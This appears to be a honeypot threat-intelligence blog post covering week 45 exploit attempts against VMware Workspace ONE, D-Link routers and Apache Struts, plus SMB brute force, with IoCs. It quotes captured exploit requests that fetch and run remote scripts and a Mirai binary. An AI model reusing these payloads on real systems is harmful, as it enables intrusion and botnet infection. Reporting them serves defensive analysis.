Honeypots: activity of the week 45

TEHTRIS honeypot analysis provides information on the types of scans and malicious actions performed by cyber attackers. Let’s have a look at 4 types of events observed in week 45.

Exploit attempt of the VMware CVE-2022-22954 (CVSSv3 9.8) vulnerability

The US IP address 85.31.44[. ]167 (AS400377 Serverion LLC) attempted to exploit the VMware critical vulnerability CVE-2022-22954 (CVSSv3 9.8) by targeting Belgian, German, Italian, Dutch and British infrastructures.

The CVE-2022-22954 affects VMware Workspace ONE Access and Identity Manager. This is a Server-Side Template Injection (SSTI) vulnerability. Template engines are tools used by web developers to insert dynamic data into web pages, allowing to dissociate the components of a page. A security flaw in a template file can allow an attacker to perform remote code execution (RCE)

In this case, the attacker uses the following two requests:


URL decode:

/catalog-portal/ui/oauth/verify?error=&deviceUdid=${"freemarker.template.utility.Execute"?new()("cd /tmp; wget; chmod 777 76d32c.sh; sh 76d32c.sh")}
/catalog-portal/ui/oauth/verify?error=&deviceUdid=${"freemarker.template.utility.Execute"?new()("cd /tmp; wget; chmod 777 c.sh; sh c.sh ducdepzai")}

The template component the attacker is trying to exploit is “Freemarker“. If the vulnerability was active on the targeted server, a file named c.sh or 76d32c.sh would be retrieved from the IP address controlled by the attacker and registered with the same AS: 85.31.44[.]190 (AS400377 – Serverion LLC). This IP address is unfavourably known from public databases, and has been seen very recently downloading malicious files (since 11/11/22), including a Mirai variant, the very active malware that infects machines and connected objects to enroll them in a botnet (SHA256 eeb5f604bfd02de92ee3805861ecb841a0a289e7c6272e573c82ba7093abfb75), and files associated with trojans such as SHA c4775b45329c83b8ec0a364640bb39c66a375fedca3446566bc2f43603a1b87f and c426e05c76d6dda0725d7aeb10438dcec5866cabbf7e268520bad630cce83651

Three IP addresses attempted to exploit a remote code execution (RCE) vulnerability on D-Link routers with the following request:

/login.cgi?cli=aa%20aa%27;wget%20http[:]//amkbins[. ]duckdns[.]org/bins/ascaris[. ]mips%20-O%20->%20/tmp/ascaris;chmod%20777%20/tmp/ascaris;/tmp/ascaris%20dlink.selfrep%27$

URL decode:

/login.cgi?cli=aa aa'; wget http[:]//amkbins[.]duckdns[.]org/bins/ascaris[. ]mips -O -> /tmp/ascaris;chmod 777 /tmp/ascaris;/tmp/ascaris dlink.selfrep'$

This request aims at exploiting the vulnerability to download malware from URL http[:]//amkbins[.]duckdns[.]org/bins/ascaris[.]mips. This URL was first seen on 23/10/22 and – at the time of writing – last seen on 14/11/22 downloading theSHA256 file 2de8419c23afff994bbc54d642e7989f471e6dc6eadaa4e443be9d5a001e5e2b from the Mirai botnet.

IoC :

IP addressASCountry
203.243.13[.]53AS4766 (Korea Telecom)KR
209.169.97[.]91AS6300 (CCI-TEXAS)US
36.99.136[.]128AS 137687 (Luoyang, Henan Province, P.R.China.)CN

As a reminder, exploit attempts on a D-Link router vulnerability had already been observed in week 38 and in week 43 .

Exploit attempt of CVE-2017-5638

7 IP addresses behaved similarly and scanned for vulnerabilities on the TEHTRIS honeypot network. Among the vulnerabilities they attempted to exploit was CVE-2017-5638 (CVSSv3. 10) discovered in Apache Struts in 2017, which allows an attacker to perform remote code execution (RCE).

The vulnerability is exploited by the content in the Headers field:

['accept-encoding: gzip', 'connection: close', 'accept: */*', "content-type: %{#context[\'com.opensymphony.xwork2.dispatcher.HttpServletResponse\'].addHeader(\'[24thg56f]\',\'1\')}.multipart/form-data"]

The bracketed reference changes from request to request (this may be a unique ID assigned by the attacker to check the vulnerability of the targeted system).

IP addressASCountry
103.165.37[. ]69AS17995 ( PT iForte Global Internet )ID
113.161.30[.]189AS 45899 ( VNPT Corp )VN
172.245.126[.]63AS 36352 ( AS-COLOCROSSING )US
186.250.136[.]213AS 262981 ( Pinpoint Tec. Pesq. Software Ltda-ME )BR
190.220.22[.]11AS 19037 ( AMX Argentina S.A. )AR
51.145.114[.]15AS 8075 ( MICROSOFT-CORP-MSN-AS-BLOCK )GB
52.224.74[.]46AS 8075 ( MICROSOFT-CORP-MSN-AS-BLOCK )US

The IP addresses 172.245.126[.]63, 186.250.136[.]213 and 52.224.74[.]46 are not known to public databases.

As for the Vietnamese IP 113.161.30[.]189, it is notably known to have links with a SHA256 trojan 249bd5e88f81d7461880554becbc4ca5f2b2b7e6bfb98ed940f0df08ebd3c65.

Bruteforce on SMB protocol

SMB is a protocol used in Windows that allows machines on the same network to exchange files. This week, two IP addresses (out of a total of 41,000 IP addresses observed) accounted for more than 20% of the SMB protocol penetration attempts on TEHTRIS honeypots.

The first one is Venezuelan 201.211.189[.]86 (AS8048 – CANTV Servicios). This IP is not known to the public databases of malicious IPs. Over 200,000 times in one week, the IP tested 12 logins, including Spanish names such as Invitado, Cuentas, usuario and tecnico01.

The second is Colombian 200.91.234[.]42 (AS18747 – IFX18747). This IP address made more than 198,000 attempts in week 45, also testing 12 logins, most of which are in Spanish (including sistemas, usuario, cuentas or invitado).